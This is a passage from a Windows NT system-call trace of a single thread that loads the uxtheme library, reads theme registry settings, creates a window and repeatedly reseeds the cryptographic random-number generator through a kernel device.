 00555   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 56, ... 72, ) == 0x0
 00556   456   NtClose  (56, ... ) == 0x0
 00557   456   NtMapViewOfSection  (72, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x8a0000), 0x0, 204800, ) == 0x0
 00558   456   NtClose  (72, ... ) == 0x0
 00559   456   NtUnmapViewOfSection  (-1, 0x8a0000, ... ) == 0x0
 00560   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1241332, ... ) }, 1241332, ... ) == 0x0
 00561   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 5, 96, ... 72, {status=0x0, info=1}, ) }, 5, 96, ... 72, {status=0x0, info=1}, ) == 0x0
 00562   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 72, ... 56, ) == 0x0
 00563   456   NtQuerySection  (56, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00564   456   NtClose  (72, ... ) == 0x0
 00565   456   NtMapViewOfSection  (56, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5ad70000), 0x0, 212992, ) == 0x0
 00566   456   NtClose  (56, ... ) == 0x0
 00567   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00568   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00569   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00570   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 56, ) == 0x0
 00571   456   NtQueryInformationToken  (56, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00572   456   NtClose  (56, ... ) == 0x0
 00573   456   NtOpenKey  (0x2001f, {24, 0, 0x640, 0, 0,  (0x2001f, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 56, ) }, ... 56, ) == 0x0
 00574   456   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\ThemeManager"}, ... 72, ) }, ... 72, ) == 0x0
 00575   456   NtQueryValueKey  (72,  (72, "Compositing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00576   456   NtClose  (72, ... ) == 0x0
 00577   456   NtClose  (56, ... ) == 0x0
 00578   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00579   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 56, ) == 0x0
 00580   456   NtQueryInformationToken  (56, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00581   456   NtClose  (56, ... ) == 0x0
 00582   456   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... 56, ) }, ... 56, ) == 0x0
 00583   456   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Control Panel\Desktop"}, ... 72, ) }, ... 72, ) == 0x0
 00584   456   NtQueryValueKey  (72,  (72, "LameButtonText", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00585   456   NtClose  (72, ... ) == 0x0
 00586   456   NtClose  (56, ... ) == 0x0
 00587   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\UxTheme.dll"}, 1240832, ... ) }, 1240832, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00588   456   NtQueryAttributesFile  ({24, 12, 0x40, 0, 0,  ({24, 12, 0x40, 0, 0, "UxTheme.dll"}, 1240832, ... ) }, 1240832, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00589   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\UxTheme.dll"}, 1240832, ... ) }, 1240832, ... ) == 0x0
 00590   456   NtUserGetProcessWindowStation  (... ) == 0x24
 00591   456   NtUserGetObjectInformation  (36, 2, 0, 0, 1243128, ... ) == 0x0
 00592   456   NtUserGetObjectInformation  (36, 2, 1350080, 16, 1243128, ... ) == 0x1
 00593   456   NtUserGetGUIThreadInfo  (456, 1243084, ... ) == 0x1
 00594   456   NtConnectPort  ( ("\ThemeApiPort", {12, 2, 1, 1}, 0x0, 0x0, 1242904, 64, ... 56, 0x0, 0x0, 0x0, 64, ) , {12, 2, 1, 1}, 0x0, 0x0, 1242904, 64, ... 56, 0x0, 0x0, 0x0, 64, ) == 0x0
 00595   456   NtRequestWaitReplyPort  (56, {32, 56, new_msg, 0, 0, 0, 0, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1513, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 452, 456, 1513, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1513, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00596   456   NtRequestWaitReplyPort  (56, {32, 56, new_msg, 0, 0, 0, 0, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\355\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1514, 0} "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 452, 456, 1514, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\355\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1514, 0} "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00597   456   NtUserCallNoParam  (29, ...
 00598   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1240376, ... ) }, 1240376, ... ) == 0x0
 00597   456   NtUserCallNoParam  ... ) == 0x0
 00599   456   NtUserSystemParametersInfo  (41, 0, 1524225160, 0, ... ) == 0x1
 00600   456   NtGdiHfontCreate  (1242456, 356, 0, 0, 1329800, ... ) == 0x80a03e0
 00601   456   NtGdiHfontCreate  (1242456, 356, 0, 0, 1329792, ... ) == 0x30a03dd
 00602   456   NtRequestWaitReplyPort  (56, {32, 56, new_msg, 0, 0, 0, 0, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1515, 0} "\0\0\0\0\0\0\0\0H\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 452, 456, 1515, 0}  (56, {32, 56, new_msg, 0, 0, 0, 0, 0} "\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 452, 456, 1515, 0} "\0\0\0\0\0\0\0\0H\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00603   456   NtMapViewOfSection  (72, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0x8a0000), {0, 0}, 331776, ) == 0x0
 00604   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00605   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00606   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00607   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00608   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00609   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00610   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00611   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00612   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00613   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00614   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00615   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00616   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00617   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00618   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00619   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00620   456   NtUserGetWindowDC  (0, ... ) == 0x1010053
 00621   456   NtGdiCreatePatternBrushInternal  (59048369, 0, 0, ... ) == 0x71003cf
 00622   456   NtUserCallOneParam  (16842835, 56, ... ) == 0x1
 00623   456   NtUserCallNoParam  (29, ...
 00624   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1239820, ... ) }, 1239820, ... ) == 0x0
 00623   456   NtUserCallNoParam  ... ) == 0x0
 00625   456   NtUserCallNoParam  (29, ...
 00626   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1239816, ... ) }, 1239816, ... ) == 0x0
 00625   456   NtUserCallNoParam  ... ) == 0x0
 00627   456   NtUserMessageCall  (0x200b4, WM_NCCREATE, 0x0, 0x12f910, 0, 670, 0, ... ) == 0x1
 00628   456   NtUserMessageCall  (0x200b4, WM_NCCALCSIZE, 0x0, 0x12f938, 0, 670, 0, ... ) == 0x0
 00629   456   NtUserSetProp  (131252, 43288, -1, ... ) == 0x1
 00552   456   NtUserCreateWindowEx  ... ) == 0x200b4
 00630   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242;\266\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00631   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00632   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00633   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00634   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00635   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00636   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00637   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00638   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00639   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "l;R&b\27\25]\3\363\311\265\302\17\210\301ly\347\215\14E\234c\260M ;5g\324\305\31\2,\2400\211\322\351\365\22\324)\376cV\374{\367\33x\213\215P;#/a\32\334~\276\313\247\34\267\221\376.\226F\204\356\265\366!\4\30.", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "l;R&b\27\25]\3\363\311\265\302\17\210\301ly\347\215\14E\234c\260M ;5g\324\305\31\2,\2400\211\322\351\365\22\324)\376cV\374{\367\33x\213\215P;#/a\32\334~\276\313\247\34\267\221\376.\226F\204\356\265\366!\4\30.", 80, ... ) , 80, ... ) == 0x0
 00640   456   NtClose  (-2147482028, ... ) == 0x0
 00630   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "+\315\203!\33\305b\204\33\245Z\227\216X\267\220\340\215lPI\340\216Tu\372\216\340\265*3^C"o\231\225\355\10\355\371\276\365\351+o\2148c\314:\254zu\15\206;\37\305\321\212s\366p{\272\353\2\362w\23\343D\221\26\314R\341\367\223\302\302\226r\210x\322\306\222P\2\332/\247\327r\221p\2R\242\20\25[\352\15[=D\25\350\263\26A\34x0}\255\305q\311u\205\2159)T\227\230|/\324\12\256z\256"k\325\307|\32\331(~s\347\15kr\23\234\214\313L'\257\25-b@\252(\337\376\361\246\334f#\310L:+\301z\244\30\152\8^\244\316M\3428\223\346\225\343\256\347*{\306\33r\32\322\214\237\327\2311\0\213)\234-\306\262\236J \244\355/'w"\7\302g[i\240\1d\211?\3\302\341r\33\311{lY\262\303\243\227I\345\261~\236\366\2178\246\357", ) o\231\225\355\10\355\371\276\365\351+o\2148c\314:\254zu\15\206;\37\305\321\212s\366p{\272\353\2\362w\23\343D\221\26\314R\341\367\223\302\302\226r\210x\322\306\222P\2\332/\247\327r\221p\2R\242\20\25[\352\15[=D\25\350\263\26A\34x0}\255\305q\311u\205\2159)T\227\230|/\324\12\256z\256 ... {status=0x0, info=256}, "+\315\203!\33\305b\204\33\245Z\227\216X\267\220\340\215lPI\340\216Tu\372\216\340\265*3^C"o\231\225\355\10\355\371\276\365\351+o\2148c\314:\254zu\15\206;\37\305\321\212s\366p{\272\353\2\362w\23\343D\221\26\314R\341\367\223\302\302\226r\210x\322\306\222P\2\332/\247\327r\221p\2R\242\20\25[\352\15[=D\25\350\263\26A\34x0}\255\305q\311u\205\2159)T\227\230|/\324\12\256z\256"k\325\307|\32\331(~s\347\15kr\23\234\214\313L'\257\25-b@\252(\337\376\361\246\334f#\310L:+\301z\244\30\152\8^\244\316M\3428\223\346\225\343\256\347*{\306\33r\32\322\214\237\327\2311\0\213)\234-\306\262\236J \244\355/'w"\7\302g[i\240\1d\211?\3\302\341r\33\311{lY\262\303\243\227I\345\261~\236\366\2178\246\357", ) \7\302g[i\240\1d\211?\3\302\341r\33\311{lY\262\303\243\227I\345\261~\236\366\2178\246\357", ) == 0x0
 00641   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00642   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00643   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00644   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00645   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00646   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00647   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00648   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00649   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00650   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "|\224\365\316a\21\271\204M\212\304S\301[\304cD \242\317\234K\336\17c\30Z\2l\266\4\306\372\317\64aa\331\242\273\210\240\262\270F\36\\373\32\250\307\346\241&q\16\210\220\335b\360!\321\251\221N\250wy?\202$\207\331\355\371\332y9", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "|\224\365\316a\21\271\204M\212\304S\301[\304cD \242\317\234K\336\17c\30Z\2l\266\4\306\372\317\64aa\331\242\273\210\240\262\270F\36\\373\32\250\307\346\241&q\16\210\220\335b\360!\321\251\221N\250wy?\202$\207\331\355\371\332y9", 80, ... ) , 80, ... ) == 0x0
 00651   456   NtClose  (-2147482028, ... ) == 0x0
 00641   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "\254\370\201G1S\361\16\0l\2304e\224 $\353\13zJ=\305\325\311\321\27W\236(\350w\333d98j\331?\304\3n\23g\327H\365F\332zcD$\264\244\225\264\3159&:\355g\17n\2\255i\251_\226\361\276[\251\272S\321\244W!\33\235D\376\324d\374\306\360\226\204\334\340\304\351\212\202tl5\373\263\32\200\13\311g)\214\\256U[\377\365?w\336\274\306x\211\352%L\346\351K\3416\26\367\274.,`~;\321u\375Ch\241\\247k\205\320M*\371\317\24403{\216\351\213+\233\177u\320\333\342\211\23\212Lo\301\1\315\365\5\314x\222\235\352\337l+\15`d\373\314\0J\10)\331\231\314\222\340*\24FP\351\321n.\1%\)\377\273\270\23h \2645\27\350\334\327\340\372\243\221\16b\37\353\217\214^5U|I\371\2721\301o\200x\252\311\263\240\267/xX9\210+", ) , ) == 0x0
 00652   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\261\34pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00653   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00654   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00655   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00656   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00657   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00658   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00659   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00660   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00661   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "\264B\17\325)^\356\16\241\315R\350\245\300\6/\21M5X\244W\305\221J\217\34\276\360:,\352\3b\343\270\1.x\252u\30\322\376\203\3168\2\376]\326\336\374\241\3478\234\361\203\5\274\7\6=m9\313d\347w\346\222u*\301\26\345o\253\276", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "\264B\17\325)^\356\16\241\315R\350\245\300\6/\21M5X\244W\305\221J\217\34\276\360:,\352\3b\343\270\1.x\252u\30\322\376\203\3168\2\376]\326\336\374\241\3478\234\361\203\5\274\7\6=m9\313d\347w\346\222u*\301\26\345o\253\276", 80, ... ) , 80, ... ) == 0x0
 00662   456   NtClose  (-2147482028, ... ) == 0x0
 00652   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "=!\357\352\242\3177\247&O\371M\313\300\16?\320\363\255D\332\342;o\277gk\203H\27\334^6\275\230m\247\215\24~d\264F\343\305\233\31%D\275\311\311v\375`\4u\22\26\12\20\357b\23\10L&n\373\20V\253\321\316\364O\177\305o\300\307\364\27Q||\234\315Z\265\355P\321\245u\357h[\365\37\35z\366\24\353\363\250\2162\36\261!\207\3]\32D\374"\233q\364\352Qc\353gQy\31\373@L\274'\320\242\35\11\360V}\214>\304e\7\200\262(k\221\274\244D\312\371\2550\254\245\204\300G\262\311\326\241\261@\353\311\364&1%|I\230\301\335\30\352P\12R\250\222\235wHyv\3z\0>\354\34\233\3\303?\314j\276\3456\2\333\343:\325"\360>\3230\234O\372\3436\225R\257\21UM\345\307iH\231H\224\235|oOb\233\313.^M\272\2\302p\325b\274i\222", ) \233q\364\352Qc\353gQy\31\373@L\274'\320\242\35\11\360V}\214>\304e\7\200\262(k\221\274\244D\312\371\2550\254\245\204\300G\262\311\326\241\261@\353\311\364&1%|I\230\301\335\30\352P\12R\250\222\235wHyv\3z\0>\354\34\233\3\303?\314j\276\3456\2\333\343:\325 ... {status=0x0, info=256}, "=!\357\352\242\3177\247&O\371M\313\300\16?\320\363\255D\332\342;o\277gk\203H\27\334^6\275\230m\247\215\24~d\264F\343\305\233\31%D\275\311\311v\375`\4u\22\26\12\20\357b\23\10L&n\373\20V\253\321\316\364O\177\305o\300\307\364\27Q||\234\315Z\265\355P\321\245u\357h[\365\37\35z\366\24\353\363\250\2162\36\261!\207\3]\32D\374"\233q\364\352Qc\353gQy\31\373@L\274'\320\242\35\11\360V}\214>\304e\7\200\262(k\221\274\244D\312\371\2550\254\245\204\300G\262\311\326\241\261@\353\311\364&1%|I\230\301\335\30\352P\12R\250\222\235wHyv\3z\0>\354\34\233\3\303?\314j\276\3456\2\333\343:\325"\360>\3230\234O\372\3436\225R\257\21UM\345\307iH\231H\224\235|oOb\233\313.^M\272\2\302p\325b\274i\222", ) , ) == 0x0
 00663   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\261\34pr{\5e\261\34pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00664   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00665   456   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00666   456   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00667   456   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00668   456   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00669   456   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00670   456   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00671   456   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482028, 2, ) }, 0, 0x0, 0, ... -2147482028, 2, ) == 0x0
 00672   456   NtSetValueKey  (-2147482028,  (-2147482028, "Seed", 0, 3, "z~\254h\360\363\36\367\303p\366\10\201\311<\276\32}\316V\34\212\21\356O\345g\30V|C\30\346\251k\257kf\375\36\231\317J\377\257\244X\310\13\377\301@:\316\27\302\231FU\276\242\36}\222\321\346\226T,\31sF\22\3713\364\20$\241\321", 80, ... ) , 0, 3,  (-2147482028, "Seed", 0, 3, "z~\254h\360\363\36\367\303p\366\10\201\311<\276\32}\316V\34\212\21\356O\345g\30V|C\30\346\251k\257kf\375\36\231\317J\377\257\244X\310\13\377\301@:\316\27\302\231FU\276\242\36}\222\321\346\226T,\31sF\22\3713\364\20$\241\321", 80, ... ) , 80, ... ) == 0x0
 00673   456   NtClose  (-2147482028, ... ) == 0x0
 00663   456   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "a\372\14\343\205B\212_l\270\214\215\222Qe\3\224\322\307\200#\244\241\317Z\361@$\1\215]\264&Ak\357x1\343\345ny\220\240\4\6}/D\10\240\213\316\221\254d\231\212VV\36\212pC\245y\353\2031\366)JN\340;", ) y\353\2031\366)JN\340;", ) == 0x0
 00674   456   NtDeviceIoControlFile  (68, 0, 0x0, 0x0, 0x390008,  (68, 0, 0x0, 0x0, 0x390008, "\365\336\37\362\254\343\220\22On\37fl\242c0pr{\5e\261\34pr{\5e\261\34pr{\5e\261\34pr{\5e\351\232\237\317M\260\24)b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00675   456   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
